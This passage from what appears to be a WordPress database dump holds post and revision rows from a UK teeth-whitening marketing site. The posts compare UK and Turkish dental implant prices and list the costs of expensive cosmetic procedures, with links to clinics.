when it comes to your long-term oral hygiene, cutting corners is not a risk worth taking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Consider the money spent on replacing missing teeth with safe and strong dental implants as an investment in your future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3><strong>A good deal</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The average dental implant cost per tooth in the UK is £2,415 but some highly respected dentists are able to offer the procedure for a lower cost of around £1,995.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is because long-established dental practices have the experience and reputation to be able to perform a large number of procedures both safely and quickly, increasing the number of satisfied customers and lowering the price.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Learn more:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/we-are-cosmetic-dentists\" data-type=\"post\" data-id=\"196\">We are Cosmetic Dentists</a></li></ul>\n<!-- /wp:list -->','Cheap implants vs expensive implants','','publish','closed','closed','','cheap-implants-vs-expensive-implants','','','2021-05-26 11:34:19','2021-05-26 11:34:19','',0,'https://teethwhiteningproduct.co.uk/?p=218',0,'post','',0),(219,1,'2021-05-26 11:34:19','2021-05-26 11:34:19','<!-- wp:heading -->\n<h2><a href=\"/\">The Quality Difference</a></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The idea of losing teeth and having unsightly gaps in our smile is never something anyone wants to encounter.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Multiple missing teeth can not only affect our self-confidence in our appearance but also have negative medical consequences for our oral health in the long term through the increased risk of infection. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Luckily, there is a popular, safe and surprisingly affordable resolution to the problem of missing teeth. Dental implants are a common procedure that is offered by most dentists practicing in the UK today.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>How much?</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dental implants can vary considerably in cost, depending on the complexity of the case, the number of missing teeth and the general state of your oral health.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BUPA calculates that the <a href=\"https://www.bupa.co.uk/dental/dental-care/treatments/implants-dentures-bridges/dental-implants/cost#:~:text=the%20average%20cost%20of%20a%20single%20implant%20in%20the%20uk%20is%20%C2%A32%2C415\" target=\"_blank\" rel=\"noreferrer noopener\">average cost</a> of a dental implant in the UK is <strong>£2,415</strong>. This represents a serious amount of money for a cosmetic procedure that is rarely covered by dental insurance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3><strong>The risk of cutting costs</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The figure of nearly £2,500 for a single tooth replacement might sound like too much, and even a small amount of research will show you that there are significantly cheaper options available abroad, in countries like Turkey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are private dental practices in Turkey that offer single dental implants for as little as <a rel=\"noreferrer noopener\" href=\"https://www.dentalcentreturkey.com/dental-treatment-prices-in-turkey#:~:text=ALPHA,%C2%A3460\" target=\"_blank\">£460</a>, which on the surface appears to be a real bargain when compared to the UK market. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Compare:</strong> Dental implant cost from a UK dentist <a href=\"https://thegentledental.co.uk/dental-implants\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/dental-implants\" target=\"_blank\" rel=\"noreferrer noopener\">here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, there are several reasons for the stark difference in price which are worth knowing about. The most expensive elements of dental implants are quality materials and qualified dentists.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Turkey and other countries in Eastern Europe suffer from:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>A generally lower standard of regulation of the dental industry</li><li>Widespread use of low-quality materials</li><li>A significantly greater risk of failure and the need for expensive follow-up treatment</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You get what you pay for</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In the UK, when it comes to dentistry, you get what you pay for. High-quality dentistry may not be the cheapest thing going, but when it comes to your long-term oral hygiene, cutting corners is not a risk worth taking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Consider the money spent on replacing missing teeth with safe and strong dental implants as an investment in your future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3><strong>A good deal</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The average dental implant cost per tooth in the UK is £2,415 but some highly respected dentists are able to offer the procedure for a lower cost of around £1,995.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is because long-established dental practices have the experience and reputation to be able to perform a large number of procedures both safely and quickly, increasing the number of satisfied customers and lowering the price.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Learn more:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/we-are-cosmetic-dentists\" data-type=\"post\" data-id=\"196\">We are Cosmetic Dentists</a></li></ul>\n<!-- /wp:list -->','Cheap implants vs expensive implants','','inherit','closed','closed','','218-revision-v1','','','2021-05-26 11:34:19','2021-05-26 11:34:19','',218,'https://teethwhiteningproduct.co.uk/218-revision-v1',0,'revision','',0),(220,1,'2021-05-26 11:43:53','2021-05-26 11:43:53',' ','','','publish','closed','closed','','220','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=220',8,'nav_menu_item','',0),(221,1,'2021-05-28 10:27:26','2021-05-28 10:27:26','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Our stories:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/cheap-implants-vs-expensive-implants\" data-type=\"post\" data-id=\"218\">Cheap implants vs expensive implants</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile\" data-type=\"page\" data-id=\"127\">How to Achieve the Perfect Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/\" data-type=\"page\" data-id=\"20\">Welcome to a whiter smile</a></li></ul>\n<!-- /wp:list -->','Most Expensive Cosmetic Procedures','','publish','closed','closed','','most-expensive-cosmetic-procedures','','','2021-05-28 10:28:40','2021-05-28 10:28:40','',0,'https://teethwhiteningproduct.co.uk/?p=221',0,'post','',0),(222,1,'2021-05-28 10:26:12','2021-05-28 10:26:12','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Our stories:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Most Expensive Cosmetic Procedures','','inherit','closed','closed','','221-revision-v1','','','2021-05-28 10:26:12','2021-05-28 10:26:12','',221,'https://teethwhiteningproduct.co.uk/221-revision-v1',0,'revision','',0),(223,1,'2021-05-28 10:27:26','2021-05-28 10:27:26','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Our stories:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://teethwhiteningproduct.co.uk/cheap-implants-vs-expensive-implants\" data-type=\"post\" data-id=\"218\">Cheap implants vs expensive implants</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile\" data-type=\"page\" data-id=\"127\">How to Achieve the Perfect Smile</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://teethwhiteningproduct.co.uk/\" data-type=\"page\" data-id=\"20\">Welcome to a whiter smile</a></p>\n<!-- /wp:paragraph -->','Most Expensive Cosmetic Procedures','','inherit','closed','closed','','221-revision-v1','','','2021-05-28 10:27:26','2021-05-28 10:27:26','',221,'https://teethwhiteningproduct.co.uk/221-revision-v1',0,'revision','',0),(224,1,'2021-05-28 10:28:04','2021-05-28 10:28:04','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:nextpage -->\n<!--nextpage-->\n<!-- /wp:nextpage -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Our stories:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"https://teethwhiteningproduct.co.uk/keeping-a-healthy-smile\" data-type=\"post\" data-id=\"98\">Keeping a Healthy Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/cheap-implants-vs-expensive-implants\" data-type=\"post\" data-id=\"218\">Cheap implants vs expensive implants</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/hollywood-smile-revamp-and-transform-your-smile\" data-type=\"post\" data-id=\"207\">Hollywood Smile – revamp and transform your smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/how-to-achieve-the-perfect-smile\" data-type=\"page\" data-id=\"127\">How to Achieve the Perfect Smile</a></li><li><a href=\"https://teethwhiteningproduct.co.uk/\" data-type=\"page\" data-id=\"20\">Welcome to a whiter smile</a></li></ul>\n<!-- /wp:list -->','Most Expensive Cosmetic Procedures','','inherit','closed','closed','','221-revision-v1','','','2021-05-28 10:28:04','2021-05-28 10:28:04','',221,'https://teethwhiteningproduct.co.uk/221-revision-v1',0,'revision','',0),(225,1,'2021-05-28 10:28:38','2021-05-28 10:28:38','<!-- wp:heading -->\n<h2><strong><a href=\"/\"><strong>The Most Expensive Beauty Treatments</strong> — Ever!</a></strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>If you\'re the kind of person who is shocked by a £100 haircut, then don\'t read any further!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As many of us look to improve our appearances and feel better about ourselves, we look towards beauty treatments to pick us up.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Considering you would pay £100 for a pedicure where fish bite your feet, it made us think what else and what other treatments that cost a lot more that people are spending their money on.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li><strong>Breast augmentation procedures: </strong>Prices for treatments like breast implants, lifts or reductions do vary. However, a breast implant can cost anywhere from £7,000 to £18,000 depending on the material chosen and the particular surgeon\'s fees. <a rel=\"noreferrer noopener\" href=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" data-type=\"URL\" data-id=\"https://www.mya.co.uk/breast-procedures/breast-enlargement\" target=\"_blank\">More</a>.</li><li><strong>Replacing missing teeth: </strong>Dental implants can also be costly, with All-on-Four treatments, which replaces a full arch of teeth can cost you from £19,000. <a rel=\"noreferrer noopener\" href=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" data-type=\"URL\" data-id=\"https://thegentledental.co.uk/treatment/all-on-four-all-on-six-same-day-teeth\" target=\"_blank\">More</a>.</li><li><strong>Facelifts:</strong> The hours spent on this procedure is what determines the cost. An endoscopic facelift can cost from £6,000-£12,000, whereas a SMAS facelift or neck lift can cost from £16,000-£26,000. Deep plane facelifts start from £20,000. <a rel=\"noreferrer noopener\" href=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" data-type=\"URL\" data-id=\"https://www.harleymedical.co.uk/cosmetic-surgery-for-women/the-face/face-lift\" target=\"_blank\">More</a>.</li><li><strong>Rhinoplasty: </strong>This is a nose job and can also vary depending on the surgeon, however, average costs are anywhere from £8,000-£20,000. <a rel=\"noreferrer noopener\" href=\"https://www.thenoseclinic.co.uk/\" data-type=\"URL\" data-id=\"https://www.thenoseclinic.co.uk/\" target=\"_blank\">More</a>.</li><li><strong>Veneers: </strong>How much do veneers cost? They cost around £1,000 per tooth depending on which cosmetic dentist you choose, for example, this top London dentist charges £3,180 for four veneers. <a rel=\"noreferrer noopener\" href=\"https://www.joeoliverdentist.co.uk/how-much-do-veneers-cost.html\" target=\"_blank\">More</a>.</li><li><strong>Tummy tucks: </strong>Falling anywhere between £9,000-£29,000. <a rel=\"noreferrer noopener\" href=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" data-type=\"URL\" data-id=\"https://www.nuffieldhealth.com/treatments/tummy-tuck-abdominoplasty\" target=\"_blank\">More</a>.</li><li><strong>Liposuction: </strong>At first can appear quite affordable, however, it is charged per part of the body. Usually used for really tough areas stubborn fat, for those who want to remove this from multiple areas can expect to pay thousands of pounds more. Starting from £7,000. <a rel=\"noreferrer noopener\" href=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" data-type=\"URL\" data-id=\"https://www.cadoganclinic.com/liposuction-clinic-london/\" target=\"_blank\">More</a>.</li><li><strong>A thousand-pound hair cut:</strong> Whilst this is not completely cosmetic, we thought it was worth a mention. The most expensive haircut is in the <a rel=\"noreferrer noopener\" href=\"https://www.stuartphillips.co.uk/\" data-type=\"URL\" data-id=\"https://www.stuartphillips.co.uk/\" target=\"_blank\">Stuart Phillips</a> salon in Covent Garden, London. A haircut can set you back £8,000. WOW.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Our 